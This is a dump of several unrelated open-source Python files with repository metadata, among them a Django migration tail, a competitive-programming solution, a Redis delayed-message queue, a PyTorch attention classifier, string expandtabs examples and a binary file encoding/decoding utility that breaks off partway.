'from_client': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['blog.Tag']", 'symmetrical': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'blog.recommend': {
'Meta': {'unique_together': "(('post', 'user'),)", 'object_name': 'Recommend'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['blog.Post']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'recommends_user'", 'to': "orm['auth.User']"})
},
'blog.subscribed': {
'Meta': {'unique_together': "(('user', 'subscribe_user'),)", 'object_name': 'Subscribed'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'subscribe_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subscribed'", 'to': "orm['auth.User']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'me_subscribe'", 'to': "orm['auth.User']"})
},
'blog.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '42'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['blog']
| [
"[email protected]"
] | |
85dcc5969e56bb08a2daeb27e23d432d34c58286 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02718/s147463629.py | e093f018cdb275a578db1fcc576e49cebc099eb6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 166 | py | # 161 B
N,M = list(map(int, input().split()))
A = list(map(int, input().split()))
list.sort(A, reverse=True)
print('Yes') if A[M-1] >= (sum(A)/(4*M)) else print('No') | [
"[email protected]"
] | |
1ebc38c9e5488846563e087b28f5172fb47bfd2c | fce15571b2b65769758d4885deb4365153672a47 | /task_queue/redis_impl.py | 280a7be2d96fe3b835fdcdecc0303fe4016e773c | [
"MIT"
] | permissive | xlui/eFuture | 239f66c698390af9d4c5b82b32eed81e36c177e8 | 9bb9e8faca561ca5ccfb16de5401b6acd2ec692d | refs/heads/py | 2021-06-02T23:52:08.224564 | 2019-08-24T04:57:24 | 2019-08-24T04:57:24 | 149,577,756 | 0 | 0 | MIT | 2021-03-20T00:10:07 | 2018-09-20T08:35:32 | Python | UTF-8 | Python | false | false | 1,624 | py | import datetime
import uuid
from log import logger
from task_queue import connection, QUEUE_KEY
def push(message: str, date: datetime.datetime):
"""Push a message into redis zset
:param message: message content
:param date: the date this message to be consumed
:return: None
"""
msg_id = str(uuid.uuid4())
pipeline = connection.pipeline()
pipeline.set(msg_id, message)
pipeline.zadd(QUEUE_KEY, {
msg_id: date.timestamp()
})
pipeline.execute()
logger.info(f'Save a new future email: [message: {message}, date: {date}]')
def pop():
"""Check the first task in redis(which is the task with the smallest score)
if the score(timestamp) is smaller or equal to current timestamp, the task
should be take out and done.
:return: True if task is take out, and False if it is not the time.
"""
task = connection.zrange(QUEUE_KEY, 0, 0)
if not task:
return False, 'No emails now!'
msg_id = task[0]
timestamp = connection.zscore(QUEUE_KEY, msg_id)
now = datetime.datetime.now().timestamp()
if timestamp < now or abs(timestamp - now) <= 1e-6:
message = connection.get(msg_id)
pipeline = connection.pipeline()
pipeline.zrem(QUEUE_KEY, msg_id)
pipeline.delete(msg_id)
pipeline.execute()
return True, message
return False, "It's too early now!"
if __name__ == '__main__':
now = datetime.datetime.now()
logger.debug('push hello')
push('hello', now + datetime.timedelta(seconds=10))
while True:
b, m = pop()
if b:
logger.debug(m)
| [
"[email protected]"
] | |
cbbfba9bdb63e74a1c7c05035f325aa7f0d7af7e | c49e35bc834c259cc0d7ab2165dbd48e12f6d1b6 | /model/word_attn_classifier.py | c5ac2ca9a9d5b3b24f2e003883f3afb2027270a6 | [
"MIT"
] | permissive | kenchan0226/dual_view_review_sum | f18997bce101ee3ac70d96813d75c6cb29ac921c | 2ff1c7323b98f0a8ca1dfb0341806e05b87faf52 | refs/heads/master | 2023-03-02T10:00:26.315254 | 2021-02-03T02:13:27 | 2021-02-03T02:13:27 | 266,673,121 | 19 | 4 | null | null | null | null | UTF-8 | Python | false | false | 3,184 | py | import torch
import torch.nn as nn
from torch.nn import init
from model.attention import Attention
class WordAttnClassifier(nn.Module):
def __init__(self, query_hidden_size, memory_bank_size, num_classes, attn_mode, dropout=0.0, ordinal=False, hr_enc=False):
super(WordAttnClassifier, self).__init__()
self.memory_bank_size = memory_bank_size
self.query_hidden_size = query_hidden_size
self.num_classes = num_classes
self.hr_enc = hr_enc
# for word level memory bank
self._query_vector = nn.Parameter(torch.zeros(1, query_hidden_size))
init.uniform_(self._query_vector, -0.1, 0.1)
self.attention_layer = Attention(query_hidden_size, memory_bank_size, coverage_attn=False, attn_mode=attn_mode)
# for sent level memory bank
if self.hr_enc:
self._sent_query_vector = nn.Parameter(torch.zeros(1, query_hidden_size))
init.uniform_(self._sent_query_vector, -0.1, 0.1)
self.sent_attention_layer = Attention(query_hidden_size, memory_bank_size, coverage_attn=False, attn_mode=attn_mode)
self.ordinal = ordinal
self.expanded_memory_size = memory_bank_size if not hr_enc else 2 * memory_bank_size
if ordinal:
self.classifier = nn.Sequential(nn.Linear(self.expanded_memory_size, self.expanded_memory_size),
nn.Dropout(p=dropout),
nn.ReLU(),
nn.Linear(self.expanded_memory_size, num_classes),
nn.Sigmoid())
else:
self.classifier = nn.Sequential(nn.Linear(self.expanded_memory_size, self.expanded_memory_size),
nn.Dropout(p=dropout),
nn.ReLU(),
nn.Linear(self.expanded_memory_size, num_classes),
nn.LogSoftmax(dim=1))
def forward(self, encoder_memory_bank, src_mask, sent_memory_bank=None, sent_mask=None):
"""
:param encoder_hidden_states: [batch, src_len, memory_bank_size]
:param sent_memory_bank: [batch, sent_num, memory_bank_size]
:return:
"""
batch_size = encoder_memory_bank.size(0)
query_vector_expanded = self._query_vector.expand(batch_size, self.query_hidden_size) # [batch, query_hidden_size]
context, attn_dist, _ = self.attention_layer(query_vector_expanded, encoder_memory_bank, src_mask)
attn_dist_tuple = (attn_dist, None)
if self.hr_enc:
sent_query_vector_expanded = self._sent_query_vector.expand(batch_size, self.query_hidden_size) # [batch, query_hidden_size]
sent_context, sent_attn_dist, _ = self.sent_attention_layer(sent_query_vector_expanded, sent_memory_bank, sent_mask)
# [batch, 2 * memory_bank_size]
context = torch.cat([context, sent_context], dim=1)
attn_dist_tuple = (attn_dist, sent_attn_dist)
logit = self.classifier(context)
return logit, attn_dist_tuple
| [
"[email protected]"
] | |
257d9c5993e931be92ff8bd92ceacd54ed6c9727 | 3869cbd5ee40e2bab5ca08b80b48115a7b4c1d5a | /Python-3/basic_examples/strings/string_expandtabs.py | c31cbcf03990c262555129f083b6bf6e26bbd25b | [
"MIT"
] | permissive | Tecmax/journaldev | 0774c441078816f22edfd68286621493dd271803 | 322caa8e88d98cfe7c71393bcd2a67cf77368884 | refs/heads/master | 2020-07-08T04:05:03.028015 | 2019-08-12T09:17:48 | 2019-08-12T09:17:48 | 203,559,030 | 0 | 1 | MIT | 2019-08-21T10:13:47 | 2019-08-21T10:13:47 | null | UTF-8 | Python | false | false | 559 | py | s = 'A\tB\tC\tD'
print(s)
print(s.expandtabs())
s = 'ABCD\tE\tF'
print(s)
print(s.expandtabs())
s = 'ABCDEFGHIJK\tG'
print(s.expandtabs())
s = 'ABCDEFGHIJK\t\tG'
print(s.expandtabs())
s = 'ABC\tD'
print(s)
print(s.expandtabs())
print(s.expandtabs(tabsize=0))
print(s.expandtabs(tabsize=1))
print(s.expandtabs(tabsize=2))
print(s.expandtabs(tabsize=3))
print(s.expandtabs(tabsize=4))
print(s.expandtabs(tabsize=5))
print(s.expandtabs(tabsize=6))
print(s.expandtabs(tabsize=7))
s = 'ABC\tD'
print(s.expandtabs(tabsize=-1))
print(s.expandtabs(tabsize=-3))
| [
"[email protected]"
] | |
1e21acec2110266a609612328d221ff317740237 | fff80cdaf12712704f36038479f50418253f42f3 | /redex/tools/python/file_extract.py | 51555fbbeb5606571a2b01d6e5c97431b3c873f0 | [
"MIT"
] | permissive | rudolfkopriva/Facebook | 1ea0cfbc116f68ae0317332eeb9155461af5645a | 56e4c6a83f992bb01849ad353004b28409e53eef | refs/heads/master | 2023-02-14T01:54:36.519860 | 2021-01-05T02:09:26 | 2021-01-05T02:09:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46,013 | py | #! /usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import binascii
import re
import string
import struct
import sys
from io import BytesIO, StringIO
SEEK_SET = 0
SEEK_CUR = 1
SEEK_END = 2
def dump_memory(base_addr, data, num_per_line, outfile):
data_len = len(data)
hex_string = binascii.hexlify(data)
addr = base_addr
ascii_str = ""
i = 0
concat = None
if data_len > 0:
if isinstance(hex_string[0], int):
concat = lambda a, b: chr(a) + chr(b) # noqa: E731
else:
concat = lambda a, b: a + b # noqa: E731
while i < data_len:
outfile.write("0x%8.8x: " % (addr + i))
bytes_left = data_len - i
if bytes_left >= num_per_line:
curr_data_len = num_per_line
else:
curr_data_len = bytes_left
hex_start_idx = i * 2
hex_end_idx = hex_start_idx + curr_data_len * 2
curr_hex_str = hex_string[hex_start_idx:hex_end_idx]
# 'curr_hex_str' now contains the hex byte string for the
# current line with no spaces between bytes
t = iter(curr_hex_str)
# Print hex bytes separated by space
outfile.write(" ".join(concat(a, b) for a, b in zip(t, t)))
# Print two spaces
outfile.write(" ")
# Calculate ASCII string for bytes into 'ascii_str'
ascii_str = ""
for j in range(i, i + curr_data_len):
ch = data[j]
if isinstance(ch, int):
ch = chr(ch)
if ch in string.printable and ch not in string.whitespace:
ascii_str += "%c" % (ch)
else:
ascii_str += "."
# Print ASCII representation and newline
outfile.write(ascii_str)
i = i + curr_data_len
outfile.write("\n")
def last_char_is_newline(s):
if s:
return s[-1] == "\n"
return False
def hex_escape(s):
return "".join(escape(c) for c in s)
def escape(c):
if isinstance(c, int):
c = chr(c)
if c in string.printable:
if c == "\n":
return "\\n"
if c == "\t":
return "\\t"
if c == "\r":
return "\\r"
return c
c = ord(c)
if c <= 0xFF:
return "\\x" + "%02.2x" % (c)
elif c <= "\uffff":
return "\\u" + "%04.4x" % (c)
else:
return "\\U" + "%08.8x" % (c)
class FileEncode:
"""Encode binary data to a file"""
def __init__(self, f, b="=", addr_size=0):
"""Initialize with an open binary file and optional byte order and
address byte size.
"""
self.file = f
self.addr_size = addr_size
self.set_byte_order(b)
def align_to(self, align):
curr_pos = self.file.tell()
delta = curr_pos % align
if delta:
pad = align - delta
if pad != 0:
self.seek(pad, SEEK_CUR)
def seek(self, offset, whence=SEEK_SET):
if self.file:
return self.file.seek(offset, whence)
raise ValueError
def tell(self):
if self.file:
return self.file.tell()
raise ValueError
def set_byte_order(self, b):
'''Set the byte order, valid values are "big", "little", "swap",
"native", "<", ">", "@", "="'''
if b == "big":
self.byte_order = ">"
elif b == "little":
self.byte_order = "<"
elif b == "swap":
# swap what ever the current byte order is
if struct.pack("H", 1).startswith("\x00"):
self.byte_order = "<"
else:
self.byte_order = ">"
elif b == "native":
self.byte_order = "="
elif b == "<" or b == ">" or b == "@" or b == "=":
self.byte_order = b
else:
raise ValueError("Invalid byte order specified: '%s'" % (b))
def put_c_string(self, value):
self.file.write(value)
self.put_sint8(0)
def put_sint8(self, value):
"""Encode a int8_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "b", value))
def put_uint8(self, value):
"""Encode a uint8_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "B", value))
def put_sint16(self, value):
"""Encode a int16_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "h", value))
def put_uint16(self, value):
"""Encode a uint16_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "H", value))
def put_sint32(self, value):
"""Encode a int32_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "i", value))
def put_uint32(self, value):
"""Encode a uint32_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "I", value))
def put_sint64(self, value):
"""Encode a int64_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "q", value))
def put_uint64(self, value):
"""Encode a uint64_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "Q", value))
def put_uleb128(self, value):
"""Encode a ULEB128 into the file at the current file position"""
while value >= 0x80:
self.put_uint8(0x80 | (value & 0x7F))
value >>= 7
self.put_uint8(value)
def put_sleb128(self, value):
if value < 0:
uvalue = (1 - value) * 2
else:
uvalue = value * 2
while True:
byte = value & 0x7F
value >>= 7
uvalue >>= 7
if uvalue != 0:
byte = byte | 0x80
self.put_uint8(byte)
if uvalue == 0:
break
def put_address(self, value):
if self.addr_size == 0:
raise ValueError
self.put_uint_size(self.addr_size, value)
def put_uint_size(self, size, value):
"""Encode a unsigned integer into the file at the current file
position as an integer whose byte size is "size"."""
if size == 1:
return self.put_uint8(value)
if size == 2:
return self.put_uint16(value)
if size == 4:
return self.put_uint32(value)
if size == 8:
return self.put_uint64(value)
print("error: integers of size %u are not supported" % (size))
def fixup_uint_size(self, size, value, offset):
"""Fixup one unsigned integer in the file at "offset" bytes from
the start of the file. The current file position will be saved and
restored."""
saved_offset = self.file.tell()
self.file.seek(offset)
self.put_uint_size(size, value)
self.file.seek(saved_offset)
class FileExtract:
"""Decode binary data from a file"""
def __init__(self, f, b="=", addr_size=0):
"""Initialize with an open binary file and optional byte order and
address byte size
"""
self.file = f
self.offsets = []
self.addr_size = addr_size
self.set_byte_order(b)
def get_size(self):
pos = self.file.tell()
self.file.seek(0, SEEK_END)
len = self.file.tell()
self.file.seek(pos, SEEK_SET)
return len
def align_to(self, align):
curr_pos = self.file.tell()
delta = curr_pos % align
if delta:
pad = align - delta
if pad != 0:
self.seek(pad, SEEK_CUR)
def get_addr_size(self):
return self.addr_size
def set_addr_size(self, addr_size):
self.addr_size = addr_size
def set_byte_order(self, b):
'''Set the byte order, valid values are "big", "little", "swap",
"native", "<", ">", "@", "="'''
if b == "big":
self.byte_order = ">"
elif b == "little":
self.byte_order = "<"
elif b == "swap":
# swap what ever the current byte order is
if struct.pack("H", 1).startswith("\x00"):
self.byte_order = "<"
else:
self.byte_order = ">"
elif b == "native":
self.byte_order = "="
elif b == "<" or b == ">" or b == "@" or b == "=":
self.byte_order = b
else:
print("Invalid byte order specified: '%s'" % (b))
def seek(self, offset, whence=SEEK_SET):
if self.file:
return self.file.seek(offset, whence)
raise ValueError
def tell(self):
if self.file:
return self.file.tell()
raise ValueError
def read_data(self, byte_size):
bytes = self.read_size(byte_size)
if len(bytes) == byte_size:
return FileExtract(
StringIO(bytes.decode("utf-8")), self.byte_order, self.addr_size
)
return None
def read_size(self, byte_size):
s = self.file.read(byte_size)
if len(s) != byte_size:
return None
return s
def push_offset_and_seek(self, offset, whence=SEEK_SET):
'''Push the current file offset and seek to "offset"'''
self.offsets.append(self.file.tell())
self.file.seek(offset, whence)
def pop_offset_and_seek(self):
"""Pop a previously pushed file offset and set the file position."""
if len(self.offsets) > 0:
self.file.seek(self.offsets.pop(), SEEK_SET)
def get_sint8(self, fail_value=0):
"""Extract a int8_t from the current file position."""
s = self.read_size(1)
return self._unpack("b", s) if s else fail_value
def get_uint8(self, fail_value=0):
"""Extract and return a uint8_t from the current file position."""
s = self.read_size(1)
return self._unpack("B", s) if s else fail_value
def get_sint16(self, fail_value=0):
"""Extract a int16_t from the current file position."""
s = self.read_size(2)
return self._unpack("h", s) if s else fail_value
def get_uint16(self, fail_value=0):
"""Extract a uint16_t from the current file position."""
s = self.read_size(2)
return self._unpack("H", s) if s else fail_value
def get_sint32(self, fail_value=0):
"""Extract a int32_t from the current file position."""
s = self.read_size(4)
return self._unpack("i", s) if s else fail_value
def get_uint32(self, fail_value=0):
"""Extract a uint32_t from the current file position."""
s = self.read_size(4)
return self._unpack("I", s) if s else fail_value
def get_sint64(self, fail_value=0):
"""Extract a int64_t from the current file position."""
s = self.read_size(8)
return self._unpack("q", s) if s else fail_value
def get_uint64(self, fail_value=0):
"""Extract a uint64_t from the current file position."""
s = self.read_size(8)
return self._unpack("Q", s) if s else fail_value
def _unpack(self, format_suffix, s):
return struct.unpack(self.byte_order + format_suffix, s)[0]
def get_address(self, fail_value=0):
if self.addr_size == 0:
print("error: invalid addr size...")
raise ValueError
else:
return self.get_uint_size(self.addr_size, fail_value)
def get_sint_size(self, size, fail_value=0):
"""Extract a signed integer from the current file position whose
size is "size" bytes long."""
if size == 1:
return self.get_sint8(fail_value)
if size == 2:
return self.get_sint16(fail_value)
if size == 4:
return self.get_sint32(fail_value)
if size == 8:
return self.get_sint64(fail_value)
print("error: integer of size %u is not supported" % (size))
return fail_value
def get_uint_size(self, size, fail_value=0):
"""Extract a unsigned integer from the current file position whose
size is "size" bytes long."""
if size == 1:
return self.get_uint8(fail_value)
if size == 2:
return self.get_uint16(fail_value)
if size == 4:
return self.get_uint32(fail_value)
if size == 8:
return self.get_uint64(fail_value)
print("error: integer of size %u is not supported" % (size))
return fail_value
def get_fixed_length_c_string(
self, n, fail_value="", isprint_only_with_space_padding=False
):
"""Extract a fixed length C string from the current file position."""
s = self.read_size(n)
if s:
(cstr,) = struct.unpack(self.byte_order + ("%i" % n) + "s", s)
# Strip trialing NULLs
cstr = cstr.strip(b"\0")
if isprint_only_with_space_padding:
for c in cstr:
if c in string.printable or ord(c) == 0:
continue
return fail_value
return cstr
else:
return fail_value
def get_c_string(self):
"""Extract a NULL terminated C string from the current position."""
cstr = ""
byte = self.get_uint8()
while byte != 0:
cstr += "%c" % byte
byte = self.get_uint8()
return cstr
def get_n_sint8(self, n, fail_value=0):
"""Extract "n" int8_t values from the current position as a list."""
s = self.read_size(n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "b", s)
else:
return (fail_value,) * n
def get_n_uint8(self, n, fail_value=0):
"""Extract "n" uint8_t values from the current position as a list."""
s = self.read_size(n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "B", s)
else:
return (fail_value,) * n
def get_n_sint16(self, n, fail_value=0):
"""Extract "n" int16_t values from the current position as a list."""
s = self.read_size(2 * n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "h", s)
else:
return (fail_value,) * n
def get_n_uint16(self, n, fail_value=0):
"""Extract "n" uint16_t values from the current position as a list."""
s = self.read_size(2 * n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "H", s)
else:
return (fail_value,) * n
def get_n_sint32(self, n, fail_value=0):
"""Extract "n" int32_t values from the current position as a list."""
s = self.read_size(4 * n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "i", s)
else:
return (fail_value,) * n
def get_n_uint32(self, n, fail_value=0):
"""Extract "n" uint32_t values from the current position as a list."""
s = self.read_size(4 * n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "I", s)
else:
return (fail_value,) * n
def get_n_sint64(self, n, fail_value=0):
"""Extract "n" int64_t values from the current position as a list."""
s = self.read_size(8 * n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "q", s)
else:
return (fail_value,) * n
def get_n_uint64(self, n, fail_value=0):
"""Extract "n" uint64_t values from the current position as a list."""
s = self.read_size(8 * n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "Q", s)
else:
return (fail_value,) * n
def get_uleb128p1(self, fail_value=0):
return self.get_uleb128(fail_value) - 1
def get_uleb128(self, fail_value=0):
"""Extract a ULEB128 number"""
byte = self.get_uint8()
# Quick test for single byte ULEB
if byte & 0x80:
result = byte & 0x7F
shift = 7
while byte & 0x80:
byte = self.get_uint8()
result |= (byte & 0x7F) << shift
shift += 7
return result
else:
return byte # Simple one byte ULEB128 value...
def get_sleb128(self, fail_value=0):
result = 0
shift = 0
size = 64
byte = 0
bytecount = 0
while 1:
bytecount += 1
byte = self.get_uint8()
result |= (byte & 0x7F) << shift
shift += 7
if (byte & 0x80) == 0:
break
# Sign bit of byte is 2nd high order bit (0x40)
if shift < size and (byte & 0x40):
result |= -(1 << shift)
return result
def dump(self, start=0, end=-1):
if end == -1:
self.seek(start, SEEK_END) # Seek to end to get size
n = self.tell() - start
else:
n = end - start
self.seek(start, SEEK_SET)
bytes = self.read_size(n)
dump_memory(0, bytes, 32, sys.stdout)
def main():
uleb_tests = [
(struct.pack("B", 0x02), 2),
(struct.pack("B", 0x7F), 127),
(struct.pack("2B", 0x80, 0x01), 128),
(struct.pack("2B", 0x81, 0x01), 129),
(struct.pack("2B", 0x82, 0x01), 130),
(struct.pack("2B", 0xB9, 0x64), 12857),
]
sleb_tests = [
(struct.pack("B", 0x02), 2),
(struct.pack("B", 0x7E), -2),
(struct.pack("2B", 0xFF, 0x00), 127),
(struct.pack("2B", 0x81, 0x7F), -127),
(struct.pack("2B", 0x80, 0x01), 128),
(struct.pack("2B", 0x80, 0x7F), -128),
(struct.pack("2B", 0x81, 0x01), 129),
(struct.pack("2B", 0xFF, 0x7E), -129),
]
num_errors = 0
print("Running unit tests...", end="")
for (s, check_n) in sleb_tests:
e = FileExtract(BytesIO(s))
n = e.get_sleb128()
if n != check_n:
num_errors += 1
print("\nerror: sleb128 extraction failed for %i (got %i)" % (check_n, n))
dump_memory(0, s, 32, sys.stdout)
for (s, check_n) in uleb_tests:
e = FileExtract(BytesIO(s))
n = e.get_uleb128()
if n != check_n:
num_errors += 1
print("\nerror: uleb128 extraction failed for %i (got %i)" % (check_n, n))
dump_memory(0, s, 32, sys.stdout)
if num_errors == 0:
print("ok")
else:
print("%u errors" % (num_errors))
print
if __name__ == "__main__":
main()
class AutoParser:
"""A class that enables easy parsing of binary files.
This class is designed to be sublcassed and clients must provide a list of
items in the constructor. Each item in the items list is a dictionary that
describes each attribute that should be added to the class when it is
decoded. A quick example for a C structure:
struct load_command {
uint32_t cmd; /* type of load command */
uint32_t cmdsize; /* total size of command in bytes */
};
The python code would look like:
class load_command(file_extract.AutoParser):
items = [
{ 'name':'cmd', 'type':'u32' },
{ 'name':'cmdsize', 'type':'u32'},
]
def __init__(self, data):
AutoParser.__init__(self, self.items, data)
Decoding a single load_command from a file involves opening a file and
creating a FileExtract object, and then decoding the load_command object:
file = open(path)
data = file_extract.FileExtract(file, '=', 4)
lc = load_command(data)
The 'lc' object now has two properties:
lc.cmd
lc.cmdsize
Item dictionaries are very easy to define and have quite a many options
to ensure it is very easy to parse a binary file by defining many
subclasses of file_extract.AutoParser and combining them together.
Item dictionaries can contain the following keys:
KEY NAME DESCRIPTION
============== ============================================================
'name' A string name of the attribute to add to this class when
decoding. If an item has no name, it will not be added to
this object when it is being decoded. Omitting the name is
handy when you have padding where you might need to decode
some bytes that are part of the on disk representation of
the binary object, but don't need the value represented
in the object itself.
'type' A string name for the type of the data to decode. See
"Builin Types" table below for valid typename values. Either
'class' An AutoParser sublcass class that will be used to decode
this item by constructing it with the data at the current
offset. This allows you to compose a AutoParser object
that is contained within another AutoParser object.
'condition' A function that takes two arguments: the current AutoParser
object that is in the process of being decoded and the
FileExtract object. The function returns True if this item
is present and should be decoded, and False if it should be
skipped. The condition is evaluated before the value is
decoded and stops the type/class/decode from decoding the
object. This can be used to only decode a value if a
previous attribute is a specific value. If a 'default' key
is present in the item dictionary, then the 'default' value
will be set as the the value for this item, otherwise the
attribute will not be added to this object:
condition_passed = item['condition'](AutoParser,
FileExtract)
'default' The default value for the current item that will be set if
the 'condition' callback function returns False.
'decode' A function that take a single file_extract.FileExtract
object argument and returns the value for this item.
value = item['decode'](FileExtract)
'align' An integer that gives the file offset alignment for this
item. This alignment can be any number and the file
position will be advanced to the next aligned offset if
needed prior to reading the value
'attr_count' A string that specifies the name of an attribute that has
already been decoded in this object. This indicates that the
value for this item is a list whose size is the integer
value of the attribute that was already decoded in a
previous item in this object.
'attr_offset' An integer that this item's value is contained within the
file at the specified offset. A seek will be performed on
the file before reading the value of this object. The file
position will be pushed onto a stack, a seek will be
performed, the item's value will be read, and then the file
position will be restored.
'attr_offset_size' A string name of an existing attribute that contains
the end offset of the data for this object. This is useful
when a list of items is contained in the file and the count
of the items is not specified, just the end offset. This is
often used with the 'attr_offset' key/value pair. The
type/class/decode will be continually called until the file
offset exceeds the offset + 'attr_offset_size'. String
tables are good example of when this is used as they string
table offset and size are often specified, but no the
number of strings in the string table.
'attr_offset_whence' A string name that specifies the type of seek to
perform on the 'attr_offset' value. This can be one of
"item", "file", "eof", "curr". "item" specifies the offset
is relative to the starting offset of this object. "file"
specifies that the offset is relative to the start of the
file. "eof" specifies that the offset is relative to the
end of tile. "curr" specifies that the offset is relative
to the current file position.
'validate' A function pointer that will be called after the value has
been extracted. The function is called with the extracted
value and should return None if the value is valid, or
return an error string if the value is not valid:
error = item['validate'](value)
if error:
raise ValueError(error)
'value_fixup' A function pointer that will be called after the item's
value has been decoded. The function will be called with one
argument, the decoded value, and returns the fixed value:
value = item['value_fixup'](value)
'debug' A string value that is printed prior to decoding the item's
value. The printed string value is prefixed by the current
file offset and allows debugging of where a value is being
decoded within the file. This helps debug the decoding of
items.
'switch' The string name of an attribute that was already decoded in
this object. The attribute value will be used as a key into
the 'cases' item key/value pair in the items supplied to the
AutoParser object. If the attribute value is not found in
the 'cases' dictionary, then 'default' will be used as the
key into the 'cases' dictionary. See 'cases' below. See
"Switch Example" below for more information.
'cases' A dictionary of values to items arrays. The 'switch' key
above specifies the name of an attribute in this object that
will be used as the key into the dictionary specified in
this key/value pair. The items that are found during the
lookup will then be decoded into this object. See
"Switch Example" below for more information.
'dump' A function pointer that is called to dump the value. The
function gets called with the value and the file:
def dump(value, file):
...
'dump_list' A function pointer that is called to dump a list of values.
The function gets called with the value and the file:
def dump_list(value, prefix, flat, file):
...
EXAMPLE 1
If you have a structure that has a count followed by an array of items
whose size is the value of count:
struct NumberArray {
uint32_t count;
uint32_t numbers[];
};
This would be respresented by the following items:
class NumberArray(AutoParser):
items = [
{'type':'u32', 'name':'count'},
{'type':'u32', 'name':'numbers', 'attr_count' : 'count'},
]
def __init__(self, data):
AutoParser.__init__(self, self.items, data)
The second item named 'numbers' will be decoded as a list of 'obj.count'
u32 values as the 'attr_count' specifies the name of an attribute that
has already been decoded into the object 'obj' and contains the count.
EXAMPLE 2
Sometimes a structure contains an offset and a count of objects. In the
example below SymtabInfo contains the offset and count of Symbol objects
that appear later in the file:
struct SymtabInfo {
uint32_t symtab_offset;
uint32_t num_symbols;
}
struct Symbol {
...;
};
The symbol table can be decoded by combinging the two things together
into the same object when decoding:
class Symbol(AutoParser):
...
class SymtabInfo(AutoParser):
items = [
{'type' : 'u32', 'name' : 'symtab_offset'},
{'type' : 'u32', 'name' : 'num_symbols' },
{'class' : Symbol,
'name' : 'symbols',
'attr_offset' : 'symtab_offset',
'attr_count' : 'num_symbols' }
]
def __init__(self, data):
AutoParser.__init__(self, self.items, data)
"""
type_regex = re.compile(r"([^\[]+)\[([0-9]+)\]")
default_formats = {
"u8": "%#2.2x",
"u16": "%#4.4x",
"u32": "%#8.8x",
"u64": "%#16.16x",
"addr": "%#16.16x",
"cstr": '"%s"',
}
read_value_callbacks = {
"u8": lambda data: data.get_uint8(),
"u16": lambda data: data.get_uint16(),
"u32": lambda data: data.get_uint32(),
"u64": lambda data: data.get_uint64(),
"s8": lambda data: data.get_sint8(),
"s16": lambda data: data.get_sint16(),
"s32": lambda data: data.get_sint32(),
"s64": lambda data: data.get_sint64(),
"addr": lambda data: data.get_address(),
"uleb": lambda data: data.get_uleb128(),
"sleb": lambda data: data.get_sleb128(),
"ulebp1": lambda data: data.get_uleb128p1(),
}
def __init__(self, items, data, context=None):
self.__offset = data.tell()
self.items = items
self.context = context # Any object you want to store for future usage
self.max_name_len = 0
self.extract_items(items, data)
self.__len = data.tell() - self.__offset
def __len__(self):
return self.__len
def get_list_header_lines(self):
"""When an object of this type is in a list, print out this string
before printing out any items"""
return None
def get_dump_header(self):
"""Override in subclasses to print this string out before any items
are dumped. This is a good place to put a description of the item
represented by this class and possible to print out a table header
in case the items are a list"""
return None
def get_dump_prefix(self):
"""Override in subclasses to print out a string before each item in
this class"""
return None
def get_dump_flat(self):
return False
def get_offset(self):
return self.__offset
def extract_items(self, items, data):
for item in items:
offset_pushed = False
if "attr_offset" in item:
offset = getattr(self, item["attr_offset"])
if "attr_offset_whence" in item:
offset_base = item["attr_offset_whence"]
if offset_base == "item":
# Offset from the start of this item
data.push_offset_and_seek(offset + self.get_offset())
offset_pushed = True
elif offset_base == "file":
# Offset from the start of the file
data.push_offset_and_seek(offset, SEEK_SET)
offset_pushed = True
elif offset_base == "eof":
# Offset from the end of the file
